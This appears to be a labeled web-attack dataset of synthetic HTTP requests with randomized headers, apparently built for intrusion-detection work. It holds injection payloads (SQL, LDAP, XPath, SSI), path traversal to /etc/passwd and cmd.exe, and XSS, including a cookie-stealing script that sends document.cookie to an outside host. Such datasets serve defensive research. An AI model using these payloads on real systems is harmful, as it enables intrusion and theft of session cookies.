Accept-Language: 2-celxef;q=0.8, alnvaes-atoO0n;q=0.6, 6akii-6ssEine;q=0.4, btj1un-5sxhtd;q=0.2
Cache-Control: tqit=afexsneo
Client-ip: 242.255.226.68
Cookie: pam7GO=smhhderynb7n;@linknaZE7O_=iacdjrtoThsbsg;AsesoL=186443;n2atdhadaet=usef%bryNCe-;uahEa=36459005;caeeV6mna9lei=rzelego'7<z
Cookie2: $Version="190"
Date: Sat, 29 Sep 07 09:10:11 UTC
ETag: "HJpPlI7f4Xw2nJvkB"
Expect: seturnT=oaeb;IrmjE
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 06 May 07 11:16:13 UTC
If-Unmodified-Since: Fri, 02 Mar 07 02:03:49 GMT
If-Match: "k3JWTcMEDBVUR_1KV1"
If-None-Match: "pbwxNHHuagfK5n.X"
If-Range: Thu, 05 Jul 07 03:58:18 UTC
Max-Forwards: 672
MIME-Version: 4.8
Pragma: ajyeoi0C=iod
Proxy-Authorization: Digest username="rgww0see"
Authorization: tlqip 3tgot=xTiOe
Range: -675973,735393-84650,-104881
Referer: /riafvl/33tte/auora/lscehx7t/iisihyEb.wmn
TE: deflate,deflate,gzip;q=0.9
Trailer: Pragma
User-Agent: Mozilla/9.9 (Machintosh; U; Mac OS X 4.1; wi-em; rv:3.6.2) Gecko/39290492
UA-CPU: x86
UA-Disp: 884,253,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 309x668
Via: HTTP/4.5 62.178.108.127:187, dm7uta/6.7 www.egish.js
Transfer-Encoding: gzip
Upgrade: irra/6.5, aec/6.4, reai65/1.7, rTN/8.4, fctm/6.2
Warning: 953 162.158.190.142 "tshTYs" 
X-Forwarded-For: 45.4.150.153
X-Serial-Number: 794611052
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46560
Start - Id: 40764
class: SSI
POST /n2x.bkUtqNG5PPOSabsl/les/u-StDD4/Eci2nrhjVekrekaei/3hsereeethn7svdet/a0wuolerttsddsn/a.s-MvJ.PX/eTD5I-lcnI-nnPlSvx/IAM-Z/a2TcF58E/ugcRCzFktu.dll? HTTP/1.0
Content-Length: 333
Content-Language: sjw
Content-Encoding: gzip
Content-Location: http://www.ddoO.uk/6iSWtsw/anut/ehtdtn/euhsi/cep3oct.tar
Content-MD5: cTI4c25pcmxlc3RjZGdybw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Feb 04 12:58:49 CET
Last-Modified: Mon, 29 Jun 09 05:43:41 GMT
Host: www.nuoo.it
Connection: 9aatrn
Accept: application/*, audio/*;q=0.8, text/*;q=0.3
Accept-Charset: iso-8859-1, iso-8859-15, euc-cn, utf-8, gb2312;q=0.4
Accept-Encoding: 
Accept-Language: slohas-omttg5n, otiea0-e0A, 4ut-dhccb;q=0.0, Tp-vxW8X;q=0.7
Cache-Control: max-stale=3
Client-ip: 166.41.33.129
Cookie: wda9otccrrhiezr=o
Cookie2: $Version="05"
Date: Sat, 10 Apr 04 15:39:19 UTC
ETag: "-mDaC72APAXSOUm"
Expect: rmaeE=isllts;rfnemmn
From: tt33en@1osNNfn.biz
If-Modified-Since: Tue, 11 Dec 07 05:32:55 UTC
If-Unmodified-Since: Sun, 10 May 09 07:45:20 CET
If-Match: *
If-None-Match: "z0laz.ruwPweKf_QTK"
If-Range: Sat, 21 Oct 06 10:13:07 GMT
Max-Forwards: 8565
MIME-Version: 8.0
Pragma: rse='8'
Proxy-Authorization: NTLM SW5hcmx0ZTA2Zmk3ZWt0bGUxZW50aHNpaFJvcm5wc2llZWFlZXVkbmF0cWxh
Authorization: NTLM bW81ZXNuOG9oZWVhdm9JaWFyYVNlb2lpbHJodGdsd2xoZGk0dXRyYWVvZHlh
Range: 21211-
Referer: /tta0iv5p/l1mre3en/ktDue/sEeoksy/iaheiose.jsp
TE: trailers,chunked;q=0.4
Trailer: Max-Forwards
User-Agent: Mozilla/2.3 (compatible; zsrinoaeni; Open BSD i586; ynodiepua; ne0e1k; cwslh)
UA-CPU: 68000
UA-Disp: 442,6070,32
UA-OS: Win98
UA-Color: color16
Via: 3.3 52.26.160.47:7, 8.3 www.icuTqst.shtml, 6.4 www.IbuaLe.css
Transfer-Encoding: compress
Upgrade: llpms/3.8, ooqW/1.4, caoE7l/5.8, OoitA/7.6
Warning: 515 255.26.146.194 "etiqarDie" 
X-Forwarded-For: 31.100.82.188
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

spd=dycaEimtsec88Iihy&on0qiiewet9icxy=pe iframe(iu%t<dwl&lbb5betpu8O2te=ozwF3w_&0btaceAr=pe~y&39e=<!--  #odbc     connect="fjllT,r3tij,zapI"       statement="select    * from  ubW"-->&rtddoabChfdnie=86236376&ra=node7zi8bfiys8&sane=Ewinntirr&owqo9ldUw=aRttUrCsID4F&ean9twdreoop=9G6t7dF&vmutYE9r=7756805

End - Id: 40764
Start - Id: 38631
class: LdapInjection
GET /eV8XrrDidy00Ax/bS9WxZV9375ed/ugU2p3khTSIVUOa/IDXv_k4XL1gG/tEps/k8reRaicef5eayosoo/Uaj-Js2Yd3updateM4/iradeb/ehwhreibnoisz/rEt6ik3A7M.jpeg?NiHnnyJ=97&e5ai=ecz%27s&tbs3ml=b_fbKYa8j5O&6hetRbjdhljre=178230&crt6nfLeahs=8539239&uqoinltbthe=nvrciuYaHei89&8pfcf3wtbnvti=ot&S.c0ArlD-24=otetstsOexec%40u+&ianhEvs=%29+%28++%7C+++%28++++cn%3D*o++%27brien*++++%29%28mail++++%3D*o++++%27brien*+++%29++++&heoa=1toimaYtaeletLRth&o4idreax2na=anHEpTkb. HTTP/1.1
Host: 198.49.200.234:5
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-icelandic, euc-cn;q=0.1, hz-gb-2312;q=0.5
Accept-Encoding: deflate;q=0.7, gzip, gzip;q=0.4, deflate;q=0.4, gzip
Accept-Language: *
Cache-Control: max-age=5852
Client-ip: 146.74.202.69
Cookie: rireee5ehalr=0132;mr=sXKXyXKia2QE
Cookie2: $Version="225"
Date: Sun, 08 Apr 07 13:56:42 UTC
ETag: W/"vITvz6y6nZ8bl.S"
Expect: 100-continue
From: snRe@zteSps5r.net
If-Modified-Since: Thu, 04 Jun 09 06:47:30 GMT
If-Unmodified-Since: Sun, 18 Sep 05 08:53:45 GMT
If-Match: "-BvHRjm7@GtoREvJO"
If-None-Match: "69-mZHCTnhnLPODUQ"
If-Range: Sat, 17 Nov 07 05:10:21 UTC
Max-Forwards: 3
MIME-Version: 8.5
Pragma: 9l3b='l16tnr'
Proxy-Authorization: NTLM dGRrNTRlNG5ubG1kSGxuZXpzRW90ZWZkdHMydXlnbHJkc3I3bndHb2V5aGU=
Authorization: NTLM dWVFZWNnN1NlZVVlcE1oaUxpVHR5bWVxdG9SaWVsYUxvcm5zbjRlcmN6dG4=
Range: 2-163
Referer: /aeatnou.sh
TE: gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: esbo3lS574/3.1.7.0.8
UA-CPU: StrongARM
UA-Disp: 397,637,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 601x4009
Via: 9.2 www.rfxEnct.shtml
Transfer-Encoding: identity
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 873 www.crqmw.shtml "oisUjyPexehaoceb" "Mon, 12 Nov 07 06:17:25 UTC"
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 53440991
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38631
Start - Id: 43891
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 80.161.243.1
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, deflate;q=0.9, deflate
Accept-Language: lahe-bh, otarlrl-ndldmtel
Cache-Control: no-transform
Client-ip: 132.194.132.1
Cookie: baibomretuek=YsxxsaEoai;HKq2Yt8=75848432;srIjciMhitluy=i8;aOk4zsjdottae=]r[dhpnl
Cookie2: $Version="05"
Date: Mon, 26 Feb 07 24:12:55 CET
ETag: "Ep17MfiXz7naL9aGqdZ"
Expect: 100-continue
From: 9HsNes@1a7h.biz
If-Modified-Since: Mon, 22 Nov 04 13:02:31 UTC
If-Unmodified-Since: Sun, 19 Mar 06 17:19:41 GMT
If-Match: "8Srd7BqaI14qLa_DNIbX"
If-None-Match: "xmMfbKlWK96TC2ZB"
If-Range: Wed, 13 Oct 04 08:34:10 GMT
Max-Forwards: 7
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: uins qttenoN=ngwe
Range: 3121-127,822-
Referer: http://een8za.com/urUes/ieu5r/Eaalnt/ey0haUt.sh
TE: chunked;q=0.2,chunked;q=0.2,gzip
Trailer: If-Match
User-Agent: Mozilla/4.3 (Machintosh; U; PPC Mac OS X 6.3; nn-eA; rv:1.5.3) Gecko/10671747
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 349x5070
Via: HTTP/0.7 221.188.184.70
Transfer-Encoding: np1euh; iwnbdsd7=rBi7ta
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 115.236.50.254
X-Serial-Number: 245906346530085
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43891
Start - Id: 41989
class: SqlInjection
GET /uMn/xcuG/jFY/HahesW/ro88uhu.uUpq/nobjectzvbscriptfRn6XciW/aYI8gIw6OJyHAkecx/eb/dC5mLe9zmo1KqNH2/nYH.htm?8knu=4135&Ctl%usaPt=492549&Elsrtombzw=%27++++OR++++%27j%27++++%3D%27&6Sna2ied=8738656&tfcxt0toinhidit=92485320&1rso8mrrmMn=13128 HTTP/1.0
Host: 59.189.117.27
Connection: lftyuht
Accept: text/*;q=0.9, video/mpeg, application/*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: tCcaei-trumrer;q=0.9
Cache-Control: min-fresh=863
Client-ip: 165.230.81.35
Cookie: hcg=5375748072
Cookie2: $Version="419"
Date: Sun, 03 Oct 04 24:36:33 CET
ETag: W/"C64kiaePTTakIoYNq8"
Expect: taus=aiyn
From: wXro@erouh.com
If-Modified-Since: Sun, 20 Jul 08 19:13:38 UTC
If-Unmodified-Since: Thu, 01 Apr 04 13:10:29 UTC
If-Match: "7X12RCsDgQOAkfE"
If-None-Match: "0.rygmfxAVgEQxL8B"
If-Range: "@3kiotqHU5azj7HoXS"
Max-Forwards: 0
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM c2U0dUNCc2F0ZUVuNWVvZ3RhTW10aWdlbGFvZXU0bUE2YWlpYw==
Authorization: Basic YXNoemdlYWU6YW1uZQ==
Range: -728027,84041-8,736156-
Referer: http://0ktdhag.net/rnorTed.jsp
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: vst1reex (enIAkUT5y; h3s-yv1Tj_; 2hnfmKZ; evNZAf6)
UA-CPU: x86
UA-Disp: 8277,101,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1066x6977
Via: 6.5 152.108.9.22:2, 2.0 221.26.68.151
Transfer-Encoding: identity
Upgrade: tsem/9.8, icrMn/2.4
Warning: 567 141.96.99.110 "rih65mresz2g" 
X-Forwarded-For: 44.123.164.50
X-Serial-Number: 772384141
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41989
Start - Id: 37351
class: LdapInjection
GET /n.DzU5DEBI0/y3hnp/dzg/vMZpSrZ29k/oP3GvwnTTzsYTVw9GUjC/sZF/at_dpT.css?apt8rcsrm2a=%3CoesasdSblv0ce HTTP/1.1
Host: www.ratt1fyiop.cz:80
Connection: close
Accept: video/mpeg;q=0.3, audio/basic
Accept-Charset: *;q=0.8
Accept-Encoding: 0849)(&(objectClass=nrfw)(|(sn  =   Rlr)(cn=u     J*))
Accept-Language: *;q=0.7
Cache-Control: max-stale=24941
Client-ip: 216.207.233.187
Cookie: TSrRhfupf=If= Gseval;n:vlIas;hervL5d=wherenf4 and m]tmpawehI;28paMu18a=8ee(qi'v9s3e;ci87idbuo=retood9nuEiy;elefiilrsle=ie5ixwpahttpseah
Cookie2: $Version="66"
Date: Sat, 29 Nov 08 20:17:14 UTC
ETag: W/"qgpf_ZNuYqhia_f."
Expect: 100-continue
If-Modified-Since: Mon, 18 Sep 06 05:59:03 GMT
If-Unmodified-Since: Sun, 14 Aug 05 17:34:52 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 23 Aug 06 16:40:29 GMT
Max-Forwards: 7
Pragma: 5aeod=ln
Proxy-Authorization: Digest uri=http://www.apmsiuyp.cz/Wrdfo/eamtufe/cmsjt.jsp
Authorization: Basic THVzcjpxZmxwVGV3cg==
Referer: /snitteu.php
Trailer: If-None-Match
User-Agent: Mozilla/7.9 (Windows; U; Win98 6.3; tq-4e; rv:4.0.8) Gecko/29756188
UA-Disp: 826,0920,16
UA-Pixels: 5121x090
Via: HTTP/8.9 23.229.197.36, FTP/6.5 176.230.115.111
Transfer-Encoding: compress
Upgrade: ii2/4.4, roa/1.5
Warning: 832 142.119.49.230:5 "wgqnniyc" "Sat, 14 Mar 09 15:27:59 GMT"
X-Serial-Number: 3225774785
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37351
Start - Id: 48269
class: XSS
POST /icsc8eAz/s1hlsioFeebwg3oOh.exe? HTTP/1.1
Content-Length: 156
Content-Language: n90to,nrwce1t
Content-Encoding: identity
Content-Location: http://www.asueoaex.net/yismuku/e8ttafr/tdr5dr.gif
Content-MD5: M2k4Y3NjZUVsZXFOc2FvYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Jan 09 24:43:25 CET
Last-Modified: Sat, 13 Mar 10 11:42:45 GMT
Host: www.yseisne.cz
Connection: keep-alive
Accept: application/rtf, video/*, image/jpeg
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: nmtaetT-g, nuOy-igr6ne, 2SDft-fiey, st-Au4taio;q=0.6, islioao3-sohtan3t;q=0.3
Cache-Control: no-store
Client-ip: 84.20.87.52
Cookie: lholiacinigltb=<img src =  "  se  "onmouseover    ="  [document.location.replace ('http://www.intein.com/cgi-bin/getitaonor.cgi'+document.cookie);]  ">;osefjauood7r=1;1he=;bluYeqE?anIe
Cookie2: $Version="78"
Date: Tue, 27 Jun 06 08:04:04 CET
ETag: W/"MQMTl9fYKleFv-7sL"
Expect: nii7=hdfni
From: c2qkS@anonc.st
If-Modified-Since: Wed, 06 Jun 07 05:20:29 CET
If-Unmodified-Since: Wed, 01 Oct 08 03:37:22 GMT
If-Match: *
If-Range: Wed, 09 Aug 06 13:34:02 UTC
Max-Forwards: 710
Pragma: 0lShmdi=0mO9az
Authorization: tlne tlep=taOa
Range: -62871,-3,-29358
Referer: /1pSn1r4a/n6Ho/ni0Xp4o/UtmleiMa/vs2N5.dll
TE: chunked;q=0.9,gzip,chunked;q=0.1
User-Agent: Mozilla/5.7 (X11; U; SunOS sun4u 5.1; ip-d2; rv:0.5.5) Gecko/88861428
UA-Color: color8
UA-Pixels: 8148x3315
Via: 7.9 www.tetoipe.htm, 3.9 163.145.24.207
Transfer-Encoding: identity
Warning: 930 128.113.36.95 "L22enq2citntiSaF3T" 

Mraasewdeuwi=ncae&hE1isnTtA=18081266&ctcn7zaEib6r=did&pn7dm4tdenohtbr=ran$eihdbnF &tivde=tRcex&6uit=172082958&s2dcplrpe5yhodl=%gh<&Te1ei0=hs1oOIqBddUD

End - Id: 48269
Start - Id: 46210
class: PathTransversal
GET /eWoST74nyCWM8aR3N.swf?n5=6277&aeu=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&pn=dvzNWp%40v1P HTTP/1.0
Host: www.iOEr.biz:6426
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: nAL-ibst
Cache-Control: max-stale=6156
Client-ip: 163.45.207.111
Cookie: nSvuayEeloeiobT=4spametame9d gcoh;ktey0anaan=rxE24RapYXUO;rmsts9eai=sstt;ZEQZt=rO@0IK
Cookie2: $Version="52"
Date: Fri, 05 Mar 04 10:47:40 CET
ETag: W/"BwoAIQ_gJnkwh@ELCI"
Expect: 100-continue
From: meamrne@llueIt.be
If-Modified-Since: Tue, 29 Mar 05 09:02:56 UTC
If-Unmodified-Since: Wed, 08 Apr 09 19:57:27 UTC
If-Match: *
If-None-Match: "x_yGuv9wLz3GcFQs"
If-Range: Thu, 21 Apr 05 14:14:02 GMT
Max-Forwards: 87
MIME-Version: 5.5
Pragma: i1so4=1wEytna
Proxy-Authorization: Basic YWNlaTp0dVJlYw==
Authorization: Digest algorithm=MD5-sess
Range: 63-8582,2-821656
Referer: http://eehta.org/atnlYNSo/ttrte.txt
TE: deflate,deflate;q=0.3
Trailer: Date
User-Agent: Mozilla/0.4 (compatible; MSIE 1.1; Linux i586; essmro)
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6581x3968
Via: 2.1 116.74.196.79, FTP/1.8 www.dohs.htm, daeltE/2.5 www.tcepsiiq.css
Transfer-Encoding: reauo; w1wRcde=ltxq6e
Upgrade: peg/8.7, taas/9.0, SiHads/8.8, ne61as/9.8
Warning: 955 125.77.10.130 "jnrsAdmraidet" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 03479803459
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46210
Start - Id: 38356
class: LdapInjection
GET /LKmocha.kuR2/lnlkmrshj/aT/aNCFhey6BfXapSe2/3itss3eyrhotncm/eao/s5fU.png?rnfauc=utwwhaieo3ooso&YupdateXposition=8&fhle1dlaecmjujr=httpozsl&9Ej9=mloel%29%28%26%28objectClass%3D++++bs*%29&X16shutdownPIkvlY2R=rylFAZwJ&ne0aodqNhr0oelp=eeto5tovitra1&esrovexebpcdtud=tnyO+%3D%7Ecsd6&7loq=q.47HlOafP HTTP/1.0
Host: 249.132.227.159:80
Connection: keep-alive
Accept: application/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: 8C8muus-f84u;q=0.5, mo4-i;q=0.9, tohxtrt-l, 8kiooil-aH
Cache-Control: AagktLCE='uo'
Client-ip: 193.201.183.61
Cookie: enrentgr=89;e0rt3ayh=9n;eoynnsheeuer=ned9qlArsl
Cookie2: $Version="71"
Date: Sun, 29 Jun 08 05:41:31 GMT
ETag: W/"5LoC-V6hl1TUEpQHFV"
Expect: 100-continue
From: 8hntrge@aiwetonej.uk
If-Modified-Since: Tue, 07 Aug 07 24:16:11 UTC
If-Unmodified-Since: Mon, 26 Apr 04 09:33:28 UTC
If-Match: "yzc6eQdiiKE7Bnon39"
If-None-Match: "m2OiEJTR038HFrW"
If-Range: *
Max-Forwards: 2
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest response="24bdDc9027Eaafbdb25b48aD0Bc2B85e"
Authorization: NTLM SHNkOG5lZ2E1bWgzNWlpZkhqdHNleXRTaW1sbkluM2N1ZW9PcnlSdQ==
Range: 0-190754,-136
Referer: http://otvoascf.cz/hseoine/eiasn8/oueh/iRuR/e7sst.nsf
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: e2nMj/3.1.5
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8555x781
Via: 7.2 115.92.196.7:1, 6.5 www.earnczr4.html
Transfer-Encoding: compress
Upgrade: Mso/2.1, 5stNn/1.9, etusna/2.9, fettee/0.9, 7agirn/3.3
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38356
Start - Id: 37497
class: LdapInjection
GET /ZD2/Wig/C4irtrauoIsk/de3/nVORCYq09EPEx/services.B4UAlZ/locationx2/sciae6tog8t/nnaiitwoHahamooIep76/Hn3vGFxIRTn/l@LLRu.u26zIRU3.asp?mdndohoDdlsi8ot=ubomzZdged&EZ9icj=otu%24r&0rCh=dusr%5Cnn+wgetsiiuAaac%3BSs&wVdols9wr1ii=69&om=lQbHv%405&ltatEtisoh6riha=275130&Dica2nanqoi=75295383&vkuveanhlnze135=ijmhRYgAD3i&tpTprnQnshes=olinsertvarl&ne-aKs9NY=telnetr HTTP/1.0
Host: 89.246.114.21
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.7, compress;q=0.0, gzip, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 202.192.182.170
Cookie: ooorleQdos=6hhswe$locationk;iokby7E=743)(&(objectClass=eat)(|(sn   =tio)(cn=1N   J*))
Cookie2: $Version="0"
Date: Thu, 01 Jul 04 21:54:50 CET
ETag: "CorI@XfNfVkKPpWX-uIH"
Expect: tiOklPl=etAort
From: iyhwr@V7ga.uk
If-Modified-Since: Mon, 23 Aug 04 12:16:09 GMT
If-Unmodified-Since: Sat, 24 Jan 04 19:10:43 CET
If-Match: "LrL6wkvzLxjqjx229"
If-None-Match: "Ra0Gjkpz-YpUYu1@3.k"
If-Range: Wed, 23 Jul 08 13:25:30 CET
Max-Forwards: 8559
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: ge0cdo 3Jnsy=TrleeY
Authorization: Basic bGFyY2hsOnRlNHd0NQ==
Range: -073
Referer: /r4Dnai/8r9n/rnrn/eesgnsgc.asp
TE: deflate
Trailer: User-Agent
User-Agent: Mozilla/7.2 (Windows; U; WinNT 8.8; 6e-ow; rv:6.9.5) Gecko/19541658
UA-OS: Windows NT
Via: 0.8 www.nEkmu.tiff:146, FTP/2.4 30.183.146.182, FTP/6.1 226.117.137.2
Transfer-Encoding: 7eiuo; Slhhne=esjoR
Warning: 830 68.213.53.48 "mehinest63raz" "Sat, 07 May 05 08:04:24 CET"
X-Serial-Number: 1348243713380
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37497
Start - Id: 49431
class: XPathInjection
GET /rmu94SgOIODxo_.O2Y/o10/lckJ8PZ8XNIec.LZ9ob/frn8fs_AUrWJ.shtml?yitupr=9&QMfUsamy=35290&tgsoO9ejebytbos=DshutdownL%3D+et+nek&9thxsr=+lch&lwo2=iv6t&mc=toit%27+++++or+++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28+++i+++%2Bj++++%2B+k+++%2B+++l++++%2B+++1%29%5D+%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or++%27Uiouoi9%27%3D%27++++tbgttee%27++or&rSpoe=zearioaihaheeree HTTP/1.1
Host: www.od1uTrF.ch
Connection: close
Accept: application/*;q=0.4, application/zip;q=0.9, text/*;q=0.7
Accept-Charset: windows-1253;q=0.4
Accept-Encoding: gzip;q=0.2, compress, compress;q=0.4
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 64.61.159.147
Cookie: eelo=187588325;etZ3v=a4sb_9;oX1NZja60dkF=1915;etrh=lxK4HWs@;axevh=46012669
Cookie2: $Version="6"
Date: Sat, 25 Aug 07 01:11:51 GMT
ETag: "6KlxO_9ouuEMb1v4Ilw"
Expect: 100-continue
From: poiter@eorm.biz
If-Modified-Since: Tue, 08 Sep 09 23:53:49 GMT
If-Unmodified-Since: Sat, 24 Oct 09 03:43:30 CET
If-Match: "KcPEIEblBQ-CmKz_cXNo"
If-None-Match: *
If-Range: Sat, 10 Dec 05 22:53:27 UTC
Max-Forwards: 1
MIME-Version: 3.8
Pragma: rp='aa8d'
Proxy-Authorization: Basic dHR0clJ5dTY6Zm9kamM3Yg==
Authorization: ohaE rdidhahe=g4aqeoxu
Range: -32,-92418
Referer: http://yUiFt4.de/jcnXtw/lplsrem.php4
TE: chunked,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.6 (X11; U; Open BSD i586 1.5; ow-sl; rv:5.0.4) Gecko/86490853
UA-CPU: StrongARM
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5208x110
Via: aYsnt/6.2 www.eto7.tiff, HTTP/4.9 www.0oteOpIe.js, 2.6 26.178.55.229:3
Transfer-Encoding: aeOew; hetnephe=htrooc
Upgrade: e0oOd/9.2, ouh2i/3.3, Ncur/2.5
Warning: 168 www.mBsttTo.jpg "zsvb" "Fri, 02 Nov 07 10:06:41 UTC"
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49431
Start - Id: 46528
class: XSS
GET /<SCRIPT>alert(document>URL)</SCRIPT>/? HTTP/1.0
Host: 243.99.118.223
Connection: close
Accept: application/rtf;q=0.9, application/zip;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: su-oE4kk;q=0.2, 6o0Near-2eOpgOg
Cache-Control: no-transform
Client-ip: 246.28.222.74
Cookie: titEncrriH3=9wfxnshz;wqornR=jt9=efOinag;RsB9yr=uel d;datnroeuRtoy=al6/eyoimg>'i
Cookie2: $Version="5"
Date: Sat, 08 Mar 08 03:10:31 CET
ETag: "aNVJT2lKpqFCO9DMA"
Expect: Sire7=hmiat
From: ns7rogjc@npah.it
If-Modified-Since: Thu, 11 Aug 05 16:05:40 CET
If-Unmodified-Since: Sat, 21 Feb 04 12:12:06 CET
If-Match: "TSdh4H0GMp-B4s0Po"
If-None-Match: "--MkXcQZKkE5hke"
If-Range: *
Max-Forwards: 6
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: nr1ti raeureu=fttsc
Range: 36325-
Referer: http://www.suleI.biz/Ioih/9wsi/wuee/mbde2.cfm
TE: trailers
Trailer: If-None-Match
User-Agent: 0e2.ILi http://www.tsmg.be
UA-CPU: x86
UA-Disp: 9295,0090,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: FTP/4.1 www.qarnNl6.js, aenbe/8.3 www.sndbd.png
Transfer-Encoding: compress
Upgrade: ier7qt/0.9, a9hc/3.6, ins/7.0, tttS5/5.5
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46528
Start - Id: 37348
class: LdapInjection
GET /sdhhrshttpcz2/omr3d/4aUm1/fhCqAyphJOJvdbN/i6@en@0jJhGc9s4K-ioo.jpeg?ad9lnmknctfusi=sc&pG43A9iSJ=651927674&rlolgrss=3691&cglthtmxtnre=32672921&9wsNoltD=nocatsnfSdTO%29s&stdintvg=0845&oedhdnrepOTe=152&vYKx66passthru46o6=4115 HTTP/1.0
Host: 214.57.130.133:80
Connection: close
Accept: video/*, video/quicktime;q=0.1
Accept-Charset: euc-tw, isiri-3342;q=0.7
Accept-Encoding: gzip;q=0.1, compress
Accept-Language: ) (   |  (oias=eNe*)
Cache-Control: no-transform
Client-ip: 181.24.153.249
Cookie2: $Version="61"
Date: Sun, 20 Jul 08 14:26:51 CET
ETag: W/"W7i6lnQqDbBMLy_yXF"
If-Modified-Since: Wed, 08 Jul 09 11:47:32 GMT
If-Match: "qAIvl@up06.rjPE"
If-None-Match: *
If-Range: *
Max-Forwards: 1
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.apmsiuyp.cz/Wrdfo/eamtufe/cmsjt.jsp
Authorization: yROura injceho=yjnrdh
Referer: http://www.3ilswa4.org/59soam.gif
Trailer: If-None-Match
User-Agent: heR6i7h4toluaviwe
UA-Disp: 620,725,16
Via: HTTP/5.0 115.169.69.85, 7.2 www.lyohep3.jpeg:64276, 1.0 3.107.129.17:35908
Transfer-Encoding: compress
X-Serial-Number: 3225774785

null

End - Id: 37348
Start - Id: 49253
class: XPathInjection
GET /7nUinuhetcV/d7appYheKuq/wY0NSlRHC4d8WC5/lX@B6IGH0blIj/2tdCnph-CscripttrTdiv56/awfwrcV/tR/oe.aspx?tbbbeigq2ttDiae=4533052&Acbi=h0pfqUqeowSer3t9nR&elpuhnlpoagal=teTIe%2Ft%2Fi9biOt%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D91%5D+%7C+++++oe%2Flgucs%2Fu%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D517%5D++or++++%27soiIdo%27++++%3D+++%27&eahILmle=e+&nadderth=65f1l%40h0c-&Iloerozhhc=ejlocationgroup+byall4upc%28saStTj&nI=9sduhdHmdusoe&zo=exYJtt%40AJn&e6ihajeheei=nnyafnIlroestnecc&Bthxd=78872 HTTP/1.1
Host: 12.28.8.140
Connection: close
Accept: text/*;q=0.5, application/*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 247.83.20.197
Cookie: k4rdkat=cseaWReumt
Cookie2: $Version="1"
Date: Wed, 01 Feb 06 02:15:55 CET
ETag: "erUlUONCohcJ0qSw"
Expect: 100-continue
